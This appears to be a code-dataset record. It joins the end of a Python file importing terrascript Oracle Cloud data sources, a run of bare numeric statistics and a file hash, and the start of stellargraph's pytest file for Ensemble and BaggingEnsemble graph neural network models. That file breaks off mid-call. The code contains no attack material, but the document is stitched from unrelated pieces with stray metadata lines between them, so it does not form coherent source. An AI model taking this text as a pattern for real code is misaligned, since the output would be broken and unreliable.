from terrascript.data.hashicorp.oci import oci_load_balancer_policies
from terrascript.data.hashicorp.oci import oci_load_balancer_protocols
from terrascript.data.hashicorp.oci import oci_load_balancer_rule_set
from terrascript.data.hashicorp.oci import oci_load_balancer_rule_sets
from terrascript.data.hashicorp.oci import oci_load_balancer_shapes
from terrascript.data.hashicorp.oci import oci_load_balancer_ssl_cipher_suite
from terrascript.data.hashicorp.oci import oci_load_balancer_ssl_cipher_suites
from terrascript.data.hashicorp.oci import oci_load_balancers
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_entities
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_entities_summary,
)
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_entity
from terrascript.data.hashicorp.oci import oci_log_analytics_log_analytics_log_group
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_log_groups,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_log_groups_summary,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rule,
)
from terrascript.data.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rules,
)
from terrascript.data.hashicorp.oci import oci_log_analytics_namespace
from terrascript.data.hashicorp.oci import oci_log_analytics_namespaces
from terrascript.data.hashicorp.oci import oci_logging_log
from terrascript.data.hashicorp.oci import oci_logging_log_group
from terrascript.data.hashicorp.oci import oci_logging_log_groups
from terrascript.data.hashicorp.oci import oci_logging_log_saved_search
from terrascript.data.hashicorp.oci import oci_logging_log_saved_searches
from terrascript.data.hashicorp.oci import oci_logging_logs
from terrascript.data.hashicorp.oci import oci_logging_unified_agent_configuration
from terrascript.data.hashicorp.oci import oci_logging_unified_agent_configurations
from terrascript.data.hashicorp.oci import oci_management_agent_management_agent
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_available_histories,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_count,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_images,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_install_key,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_install_keys,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_plugin_count,
)
from terrascript.data.hashicorp.oci import (
oci_management_agent_management_agent_plugins,
)
from terrascript.data.hashicorp.oci import oci_management_agent_management_agents
from terrascript.data.hashicorp.oci import (
oci_management_dashboard_management_dashboards_export,
)
from terrascript.data.hashicorp.oci import oci_marketplace_accepted_agreement
from terrascript.data.hashicorp.oci import oci_marketplace_accepted_agreements
from terrascript.data.hashicorp.oci import oci_marketplace_categories
from terrascript.data.hashicorp.oci import oci_marketplace_listing
from terrascript.data.hashicorp.oci import oci_marketplace_listing_package
from terrascript.data.hashicorp.oci import (
oci_marketplace_listing_package_agreements,
)
from terrascript.data.hashicorp.oci import oci_marketplace_listing_packages
from terrascript.data.hashicorp.oci import oci_marketplace_listing_taxes
from terrascript.data.hashicorp.oci import oci_marketplace_listings
from terrascript.data.hashicorp.oci import oci_marketplace_publication
from terrascript.data.hashicorp.oci import oci_marketplace_publication_package
from terrascript.data.hashicorp.oci import oci_marketplace_publication_packages
from terrascript.data.hashicorp.oci import oci_marketplace_publications
from terrascript.data.hashicorp.oci import oci_marketplace_publishers
from terrascript.data.hashicorp.oci import oci_metering_computation_configuration
from terrascript.data.hashicorp.oci import oci_metering_computation_custom_table
from terrascript.data.hashicorp.oci import oci_metering_computation_custom_tables
from terrascript.data.hashicorp.oci import oci_metering_computation_queries
from terrascript.data.hashicorp.oci import oci_metering_computation_query
from terrascript.data.hashicorp.oci import oci_monitoring_alarm
from terrascript.data.hashicorp.oci import oci_monitoring_alarm_history_collection
from terrascript.data.hashicorp.oci import oci_monitoring_alarm_statuses
from terrascript.data.hashicorp.oci import oci_monitoring_alarms
from terrascript.data.hashicorp.oci import oci_monitoring_metric_data
from terrascript.data.hashicorp.oci import oci_monitoring_metrics
from terrascript.data.hashicorp.oci import oci_mysql_analytics_cluster
from terrascript.data.hashicorp.oci import oci_mysql_channel
from terrascript.data.hashicorp.oci import oci_mysql_channels
from terrascript.data.hashicorp.oci import oci_mysql_heat_wave_cluster
from terrascript.data.hashicorp.oci import oci_mysql_mysql_backup
from terrascript.data.hashicorp.oci import oci_mysql_mysql_backups
from terrascript.data.hashicorp.oci import oci_mysql_mysql_configuration
from terrascript.data.hashicorp.oci import oci_mysql_mysql_configurations
from terrascript.data.hashicorp.oci import oci_mysql_mysql_db_system
from terrascript.data.hashicorp.oci import oci_mysql_mysql_db_systems
from terrascript.data.hashicorp.oci import oci_mysql_mysql_versions
from terrascript.data.hashicorp.oci import oci_mysql_shapes
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_health
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_set
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_backend_set_health,
)
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backend_sets
from terrascript.data.hashicorp.oci import oci_network_load_balancer_backends
from terrascript.data.hashicorp.oci import oci_network_load_balancer_listener
from terrascript.data.hashicorp.oci import oci_network_load_balancer_listeners
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer_health,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers_policies,
)
from terrascript.data.hashicorp.oci import (
oci_network_load_balancer_network_load_balancers_protocols,
)
from terrascript.data.hashicorp.oci import oci_nosql_index
from terrascript.data.hashicorp.oci import oci_nosql_indexes
from terrascript.data.hashicorp.oci import oci_nosql_table
from terrascript.data.hashicorp.oci import oci_nosql_tables
from terrascript.data.hashicorp.oci import oci_objectstorage_bucket
from terrascript.data.hashicorp.oci import oci_objectstorage_bucket_summaries
from terrascript.data.hashicorp.oci import oci_objectstorage_namespace
from terrascript.data.hashicorp.oci import oci_objectstorage_namespace_metadata
from terrascript.data.hashicorp.oci import oci_objectstorage_object
from terrascript.data.hashicorp.oci import oci_objectstorage_object_head
from terrascript.data.hashicorp.oci import oci_objectstorage_object_lifecycle_policy
from terrascript.data.hashicorp.oci import oci_objectstorage_object_versions
from terrascript.data.hashicorp.oci import oci_objectstorage_objects
from terrascript.data.hashicorp.oci import oci_objectstorage_preauthrequest
from terrascript.data.hashicorp.oci import oci_objectstorage_preauthrequests
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_policies
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_policy
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_sources
from terrascript.data.hashicorp.oci import oci_oce_oce_instance
from terrascript.data.hashicorp.oci import oci_oce_oce_instances
from terrascript.data.hashicorp.oci import oci_ocvp_esxi_host
from terrascript.data.hashicorp.oci import oci_ocvp_esxi_hosts
from terrascript.data.hashicorp.oci import oci_ocvp_sddc
from terrascript.data.hashicorp.oci import oci_ocvp_sddcs
from terrascript.data.hashicorp.oci import oci_ocvp_supported_skus
from terrascript.data.hashicorp.oci import (
oci_ocvp_supported_vmware_software_versions,
)
from terrascript.data.hashicorp.oci import oci_oda_oda_instance
from terrascript.data.hashicorp.oci import oci_oda_oda_instances
from terrascript.data.hashicorp.oci import oci_ons_notification_topic
from terrascript.data.hashicorp.oci import oci_ons_notification_topics
from terrascript.data.hashicorp.oci import oci_ons_subscription
from terrascript.data.hashicorp.oci import oci_ons_subscriptions
from terrascript.data.hashicorp.oci import oci_opsi_database_insight
from terrascript.data.hashicorp.oci import oci_opsi_database_insights
from terrascript.data.hashicorp.oci import oci_opsi_enterprise_manager_bridge
from terrascript.data.hashicorp.oci import oci_opsi_enterprise_manager_bridges
from terrascript.data.hashicorp.oci import oci_opsi_host_insight
from terrascript.data.hashicorp.oci import oci_opsi_host_insights
from terrascript.data.hashicorp.oci import oci_optimizer_categories
from terrascript.data.hashicorp.oci import oci_optimizer_category
from terrascript.data.hashicorp.oci import oci_optimizer_enrollment_status
from terrascript.data.hashicorp.oci import oci_optimizer_enrollment_statuses
from terrascript.data.hashicorp.oci import oci_optimizer_histories
from terrascript.data.hashicorp.oci import oci_optimizer_profile
from terrascript.data.hashicorp.oci import oci_optimizer_profiles
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation_strategies
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation_strategy
from terrascript.data.hashicorp.oci import oci_optimizer_recommendations
from terrascript.data.hashicorp.oci import oci_optimizer_resource_action
from terrascript.data.hashicorp.oci import oci_optimizer_resource_actions
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance
from terrascript.data.hashicorp.oci import (
oci_osmanagement_managed_instance_event_report,
)
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance_group
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance_groups
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instances
from terrascript.data.hashicorp.oci import oci_osmanagement_software_source
from terrascript.data.hashicorp.oci import oci_osmanagement_software_sources
from terrascript.data.hashicorp.oci import oci_resourcemanager_stack
from terrascript.data.hashicorp.oci import oci_resourcemanager_stack_tf_state
from terrascript.data.hashicorp.oci import oci_resourcemanager_stacks
from terrascript.data.hashicorp.oci import oci_sch_service_connector
from terrascript.data.hashicorp.oci import oci_sch_service_connectors
from terrascript.data.hashicorp.oci import oci_service_catalog_private_application
from terrascript.data.hashicorp.oci import (
oci_service_catalog_private_application_package,
)
from terrascript.data.hashicorp.oci import (
oci_service_catalog_private_application_packages,
)
from terrascript.data.hashicorp.oci import oci_service_catalog_private_applications
from terrascript.data.hashicorp.oci import oci_service_catalog_service_catalog
from terrascript.data.hashicorp.oci import (
oci_service_catalog_service_catalog_association,
)
from terrascript.data.hashicorp.oci import (
oci_service_catalog_service_catalog_associations,
)
from terrascript.data.hashicorp.oci import oci_service_catalog_service_catalogs
from terrascript.data.hashicorp.oci import oci_streaming_connect_harness
from terrascript.data.hashicorp.oci import oci_streaming_connect_harnesses
from terrascript.data.hashicorp.oci import oci_streaming_stream
from terrascript.data.hashicorp.oci import oci_streaming_stream_pool
from terrascript.data.hashicorp.oci import oci_streaming_stream_pools
from terrascript.data.hashicorp.oci import oci_streaming_streams
from terrascript.data.hashicorp.oci import oci_vault_secret
from terrascript.data.hashicorp.oci import oci_vault_secret_version
from terrascript.data.hashicorp.oci import oci_vault_secrets
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipe,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipes,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_target,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_targets,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipe,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipes,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_target,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_targets,
)
from terrascript.data.hashicorp.oci import oci_waas_address_list
from terrascript.data.hashicorp.oci import oci_waas_address_lists
from terrascript.data.hashicorp.oci import oci_waas_certificate
from terrascript.data.hashicorp.oci import oci_waas_certificates
from terrascript.data.hashicorp.oci import oci_waas_custom_protection_rule
from terrascript.data.hashicorp.oci import oci_waas_custom_protection_rules
from terrascript.data.hashicorp.oci import oci_waas_edge_subnets
from terrascript.data.hashicorp.oci import oci_waas_http_redirect
from terrascript.data.hashicorp.oci import oci_waas_http_redirects
from terrascript.data.hashicorp.oci import oci_waas_protection_rule
from terrascript.data.hashicorp.oci import oci_waas_protection_rules
from terrascript.data.hashicorp.oci import oci_waas_waas_policies
from terrascript.data.hashicorp.oci import oci_waas_waas_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.oci
#
# t = terrascript.provider.hashicorp.oci.oci()
# s = str(t)
#
# assert 'https://github.com/terraform-providers/terraform-provider-oci' in s
# assert '4.45.0' in s
| 35.722625
| 88
| 0.822283
| 10,589
| 83,841
| 6.180565
| 0.05534
| 0.184457
| 0.275586
| 0.321517
| 0.972603
| 0.971473
| 0.970006
| 0.965132
| 0.804877
| 0.474574
| 0
| 0.000262
| 0.13534
| 83,841
| 2,346
| 89
| 35.737852
| 0.902516
| 0.005892
| 0
| 0.150302
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000426
| 0
| 1
| 0.002266
| true
| 0.003021
| 0.761329
| 0
| 0.763595
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
fe238b20f267105ef10d7964c5c579d90a332646
| 28,305
|
py
|
Python
|
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018-2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import networkx as nx
import numpy as np
import tensorflow as tf
from stellargraph import StellarGraph
from stellargraph.layer import (
GraphSAGE,
GCN,
GAT,
HinSAGE,
link_classification,
link_regression,
)
from stellargraph.mapper import (
GraphSAGENodeGenerator,
FullBatchNodeGenerator,
HinSAGENodeGenerator,
GraphSAGELinkGenerator,
HinSAGELinkGenerator,
)
from stellargraph.utils import Ensemble, BaggingEnsemble
from tensorflow.keras import layers, Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import categorical_crossentropy, binary_crossentropy
# FIXME (#535): Consider using graph fixtures
def example_graph_1(feature_size=None):
G = nx.Graph()
elist = [(1, 2), (2, 3), (1, 4), (3, 2), (5, 6), (1, 5)]
G.add_nodes_from([1, 2, 3, 4, 5, 6], label="default")
G.add_edges_from(elist, label="default")
# Add example features
if feature_size is not None:
for v in G.nodes():
G.nodes[v]["feature"] = np.ones(feature_size)
return StellarGraph(G, node_features="feature")
else:
return StellarGraph(G)
def create_graphSAGE_model(graph, link_prediction=False):
if link_prediction:
# We are going to train on the original graph
generator = GraphSAGELinkGenerator(graph, batch_size=2, num_samples=[2, 2])
edge_ids_train = np.array([[1, 2], [2, 3], [1, 3]])
train_gen = generator.flow(edge_ids_train, np.array([1, 1, 0]))
else:
generator = GraphSAGENodeGenerator(graph, batch_size=2, num_samples=[2, 2])
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
# if link_prediction:
# edge_ids_train = np.array([[1, 2], [2, 3], [1, 3]])
# train_gen = generator.flow(edge_ids_train, np.array([1, 1, 0]))
# else:
# train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GraphSAGE(
layer_sizes=[8, 8], generator=generator, bias=True, dropout=0.5
)
if link_prediction:
# Expose input and output sockets of graphsage, for source and destination nodes:
x_inp_src, x_out_src = base_model.node_model()
x_inp_dst, x_out_dst = base_model.node_model()
# re-pack into a list where (source, destination) inputs alternate, for link inputs:
x_inp = [x for ab in zip(x_inp_src, x_inp_dst) for x in ab]
# same for outputs:
x_out = [x_out_src, x_out_dst]
prediction = link_classification(
output_dim=1, output_act="relu", edge_embedding_method="ip"
)(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
else:
x_inp, x_out = base_model.node_model()
prediction = layers.Dense(units=2, activation="softmax")(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
return base_model, keras_model, generator, train_gen
def create_HinSAGE_model(graph, link_prediction=False):
if link_prediction:
generator = HinSAGELinkGenerator(
graph,
batch_size=2,
num_samples=[2, 1],
head_node_types=["default", "default"],
)
edge_ids_train = np.array([[1, 2], [2, 3], [1, 3]])
train_gen = generator.flow(edge_ids_train, np.array([1, 1, 0]))
else:
generator = HinSAGENodeGenerator(
graph, batch_size=2, num_samples=[2, 2], head_node_type="default"
)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = HinSAGE(
layer_sizes=[8, 8], generator=generator, bias=True, dropout=0.5
)
if link_prediction:
# Define input and output sockets of hinsage:
x_inp, x_out = base_model.build()
# Final estimator layer
prediction = link_regression(edge_embedding_method="ip")(x_out)
else:
x_inp, x_out = base_model.build()
prediction = layers.Dense(units=2, activation="softmax")(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
return base_model, keras_model, generator, train_gen
def create_GCN_model(graph):
generator = FullBatchNodeGenerator(graph)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GCN(
layer_sizes=[8, 2],
generator=generator,
bias=True,
dropout=0.5,
activations=["elu", "softmax"],
)
x_inp, x_out = base_model.node_model()
keras_model = Model(inputs=x_inp, outputs=x_out)
return base_model, keras_model, generator, train_gen
def create_GAT_model(graph):
generator = FullBatchNodeGenerator(graph, sparse=False)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GAT(
layer_sizes=[8, 8, 2],
generator=generator,
bias=True,
in_dropout=0.5,
attn_dropout=0.5,
activations=["elu", "elu", "softmax"],
normalize=None,
)
x_inp, x_out = base_model.node_model()
keras_model = Model(inputs=x_inp, outputs=x_out)
return base_model, keras_model, generator, train_gen
#
# Test for class Ensemble instance creation with invalid parameters given.
#
def test_ensemble_init_parameters():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
base_model, keras_model, generator, train_gen = create_graphSAGE_model(graph)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
base_model = gnn_model[0]
keras_model = gnn_model[1]
# Test mixed types
with pytest.raises(ValueError):
Ensemble(base_model, n_estimators=3, n_predictions=3)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=0)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=-3)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=1.7)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=0, n_predictions=11)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=-8, n_predictions=11)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=2.5, n_predictions=11)
ens = Ensemble(keras_model, n_estimators=7, n_predictions=10)
assert len(ens.models) == 7
assert ens.n_estimators == 7
assert ens.n_predictions == 10
#
# Repeat for BaggingEnsemble
# Test mixed types
with pytest.raises(ValueError):
BaggingEnsemble(base_model, n_estimators=3, n_predictions=3)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=0)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=-3)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=1.7)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=0, n_predictions=11)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=-8, n_predictions=11)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=2.5, n_predictions=11)
ens = BaggingEnsemble(keras_model, n_estimators=7, n_predictions=10)
assert len(ens.models) == 7
assert ens.n_estimators == 7
assert ens.n_predictions == 10
def test_compile():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=5)
# These are actually raised by keras but I added a check just to make sure
with pytest.raises(ValueError):
ens.compile(optimizer=Adam(), loss=None, weighted_metrics=["acc"])
with pytest.raises(ValueError): # must specify the optimizer to use
ens.compile(
optimizer=None, loss=categorical_crossentropy, weighted_metrics=["acc"]
)
with pytest.raises(
ValueError
): # The metric is made up so it should raise ValueError
ens.compile(
optimizer=Adam(),
loss=categorical_crossentropy,
weighted_metrics=["f1_accuracy"],
)
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=5)
# These are actually raised by keras but I added a check just to make sure
with pytest.raises(ValueError):
ens.compile(optimizer=Adam(), loss=None, weighted_metrics=["acc"])
with pytest.raises(ValueError): # must specify the optimizer to use
ens.compile(
optimizer=None, loss=categorical_crossentropy, weighted_metrics=["acc"]
)
with pytest.raises(
ValueError
): # The metric is made up so it should raise ValueError
ens.compile(
optimizer=Adam(),
loss=categorical_crossentropy,
weighted_metrics=["f1_accuracy"],
)
def test_Ensemble_fit_generator():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
train_gen = gnn_model[3]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
ens.fit_generator(train_gen, epochs=1, verbose=0, shuffle=False)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator, # wrong type
epochs=10,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
def test_BaggingEnsemble_fit_generator():
tf.keras.backend.clear_session()
train_data = np.array([1, 2])
train_targets = np.array([[1, 0], [0, 1]])
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
train_gen = gnn_model[3]
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=1,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
# This is a BaggingEnsemble so the generator in the below call is of the wrong type.
with pytest.raises(ValueError):
ens.fit_generator(
train_gen,
train_data=train_data,
train_targets=train_targets,
epochs=10,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=None, # Should not be None
epochs=10,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=None,
train_targets=None,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
bag_size=-1, # should be positive integer smaller than or equal to len(train_data) or None
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
bag_size=10, # larger than the number of training points
)
def test_evaluate_generator():
tf.keras.backend.clear_session()
test_data = np.array([3, 4, 5])
test_targets = np.array([[1, 0], [0, 1], [0, 1]])
graph = example_graph_1(feature_size=5)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator, test_data=test_data, test_targets=test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=test_data,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(test_data, test_targets),
test_data=test_data,
test_targets=test_targets,
)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(test_data, test_targets)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator, test_data=test_data, test_targets=test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=test_data,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(test_data, test_targets),
test_data=test_data,
test_targets=test_targets,
)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(test_data, test_targets)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
def test_predict_generator():
tf.keras.backend.clear_session()
# test_data = np.array([[0, 0], [1, 1], [0.8, 0.8]])
test_data = np.array([4, 5, 6])
test_targets = np.array([[1, 0], [0, 1], [0, 1]])
graph = example_graph_1(feature_size=2)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for i, gnn_model in enumerate(gnn_models):
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=2)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(test_data)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=test_data)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
if i > 1:
# GAT and GCN are full batch so the batch dimension is 1
assert len(test_predictions) == 1
assert test_predictions.shape[1] == test_targets.shape[0]
else:
assert len(test_predictions) == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
if i > 1:
assert test_predictions.shape[2] == 1
else:
assert test_predictions.shape[2] == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=2)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(test_data)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=test_data)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
if i > 1:
# GAT and GCN are full batch so the batch dimension is 1
assert len(test_predictions) == 1
assert test_predictions.shape[1] == test_targets.shape[0]
else:
assert len(test_predictions) == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
if i > 1:
assert test_predictions.shape[2] == 1
else:
assert test_predictions.shape[2] == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
#
# Tests for link prediction that can't be combined easily with the node attribute inference workflow above.
#
def test_evaluate_generator_link_prediction():
tf.keras.backend.clear_session()
edge_ids_test = np.array([[1, 2], [2, 3], [1, 3]])
edge_labels_test = np.array([1, 1, 0])
graph = example_graph_1(feature_size=4)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
